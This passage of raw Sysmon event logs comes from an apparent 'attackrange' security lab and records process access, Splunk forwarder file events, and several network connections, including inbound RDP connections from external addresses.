Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1ED7101BFA94A1C7C8613133EF39667,SHA256=B1B71A4430A8629C581A7633102AA25967EB8D3EC60BEB1E97019CC7C2EBC86D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:39.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=854B99CB58F424E5D5B4C7589C7F4D3B,SHA256=719E778439722FE98CA95C1228E37CF6137D5E152BFEE14F6F05CA32312BB794,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.947{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001054591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.909{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACB9E3C07F895C656CC4B31572C2CCAB,SHA256=F1C13F7002AE93A1D178D560AF5E6DB05DEA2E9276A777627FCDC563C823CAC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:39.104{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse45.141.87.27-16574-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:40.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC1702975D4F684119448E14068C92E,SHA256=6479AF503F0501F34B4E90EF9932016A1713DB4880D619865F2D5347110F1A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EB7269E1D02F01C5FF7821748D9594,SHA256=AFF88296CC4F4EE3359B30396440F787DE28FF8F95676929BF86F904141A7732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA2F719C540CE801A725BB0A65736173,SHA256=4668C5A00B04B41AF6E52CAB0A14B3224E6F021C1AC5A4C0EA54B4031A9C4764,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:32.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61967-false10.0.1.12-8000- 354300x8000000000000000810385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:40.181{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57461-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:41.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33226F4772BAA1142AB5A3EA7BD688EE,SHA256=E75652F5CD8B782FBC3B256C09FB8B4EA928143415C90D240D8C28FF2069F53F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:32.932{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru36518-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001054626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 